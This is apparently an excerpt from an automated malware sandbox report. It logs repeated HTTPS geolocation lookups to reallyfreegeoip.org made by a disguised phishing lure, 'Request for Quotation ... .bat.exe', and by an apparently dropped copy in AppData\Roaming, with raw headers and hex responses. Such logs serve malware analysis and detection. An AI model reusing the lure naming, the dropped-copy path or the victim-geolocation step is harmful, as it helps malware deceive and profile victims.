                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1977&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1461461&cwnd=209&unsent_bytes=0&cid=1f01311cc8d4cf90&ts=469&x=0"
                                                                                                                      2024-11-21 11:20:26 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.949775188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:28 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:28 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:28 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151937
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DR%2F7guaa4HD6fIR5gYxDG4DHQvd9Y%2B1S7gpcEd0Lx7CdO4%2Fj49zL4xo3GlP2cbp2%2FE8RQ5TFGgL%2BROa45mNEtNlPQToqMX%2BHhHWWoLRheOnCsWdgCy4nQgaDep5omlbuQhcZbeze"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a6928dade96-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2164&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1286910&cwnd=228&unsent_bytes=0&cid=bcad66b7b79a2f60&ts=464&x=0"
                                                                                                                      2024-11-21 11:20:28 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.949781188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:29 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:29 UTC855INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:29 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151938
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=45%2FxvjXRI7L3Xytn8Wj0buWWrjPz0QO%2FvHLMyXDesGLXHHFdUxRH4EhhwesJq6MMyYCNimghdIUFkC05HOrW92ezxticMCOB0HK5qRBTKjYxcohKAv04%2FGc%2Fc%2Bg06ExmX4oTRJX9"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a713ff94340-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1639&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1778319&cwnd=199&unsent_bytes=0&cid=d540bb3e071acc65&ts=461&x=0"
                                                                                                                      2024-11-21 11:20:29 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.949789188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:31 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:31 UTC853INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:31 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151940
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xh3BAjTWKmpS71A1xeqGshvAq7ZYlvE6p4K41K9M8f%2FQmqdJs8%2F0fcnGUKudGIBgBQyvADoHd4j06hhKDRsrjlo0FDvfs%2BWFgKH93%2F03t1R6eJwEjeKK3mWs3xmuu3rLDBYZXbTf"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a7cc88119cf-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1047721&cwnd=252&unsent_bytes=0&cid=644f78d0aa2f192e&ts=461&x=0"
                                                                                                                      2024-11-21 11:20:31 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.949796188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:33 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:33 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:33 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151942
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kFHzEv4X3Z2YI%2FynDwGe0IlURlD%2BBx4Rr44TfVCO3cESKCOOGq5VQpVyaL8WCdkS4iH8%2FV89HfIVFgD%2Fiuisq9C3AhJObiijcLlG79paqqKQ0zhNBS0Yom%2BC0VyNd2cvZGNj0j%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a8b29ad0f63-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1546&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1875401&cwnd=219&unsent_bytes=0&cid=24b38f5929a6bf0d&ts=459&x=0"
                                                                                                                      2024-11-21 11:20:33 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.949797188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:34 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:34 UTC856INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:34 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151943
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rbrus5ry61uJzeJ7ztsRPgV0mPzVMTICutea8u%2FfEGjtE5bNpic7hLWrLLEUra3VMhog2P%2FnmX4PYb4fNGU%2BQ5w%2BOHZPadib%2FKLJhED8vi6H5Kz6B4i080jgpROZq3O4npL7ahFo"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a90adad8cc3-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=14986&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1465863&cwnd=217&unsent_bytes=0&cid=cdcc52d6d470cfcd&ts=461&x=0"
                                                                                                                      2024-11-21 11:20:34 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.949805188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:36 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:37 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:37 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151946
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcbxT5VEMIP%2F%2FSPNUzp4nyh4EmsAg7DbiQARgVEXnlnsfRbIvteiIqwb1cng3U%2BlXhHA8wqi%2B8BWZEojfg0qNT%2BYLUugk0yXnpShK60Ex8l4X3wJuZ7t3anlNHbvk%2BCqHIz5UJkv"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a9f9d637c99-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1544156&cwnd=229&unsent_bytes=0&cid=6429d99af6a0c429&ts=460&x=0"
                                                                                                                      2024-11-21 11:20:37 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.949806188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:37 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:37 UTC855INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:37 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151946
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20kSWI2sb1arPwX5Bgh6nQ7jNbppjHeTU%2FMqqOVpCNzQN9nPzBp9oS56r3qMwGcrPQeLmm1FkYTAgQUudte1V1JB77%2F64%2BZUtV8MCIwI78%2Bdqseai1nbUxIrO1hHTnxQ04uck%2BwW"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604aa41e534252-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1570&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1813664&cwnd=235&unsent_bytes=0&cid=0e863676e41abcc1&ts=464&x=0"
                                                                                                                      2024-11-21 11:20:37 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.949814188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:39 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:40 UTC851INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:40 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151949
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D76Viau658wwSPTMSOJBs%2BBl8U4S40E2JseDIh0VYIExGZJwQMkdnXjR%2BTGfYpHHSnaPE7phTSV2LSJY9HaKnMo7V1yzlpbH8BMq%2BJ6TANtVJFMAQn1FTwtOgPaRiky4fo9DP1GN"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604ab34c8d8c5d-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1803&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1593886&cwnd=202&unsent_bytes=0&cid=7a339ed6331382da&ts=462&x=0"
                                                                                                                      2024-11-21 11:20:40 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.949820188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:40 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:41 UTC853INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:40 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151949
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
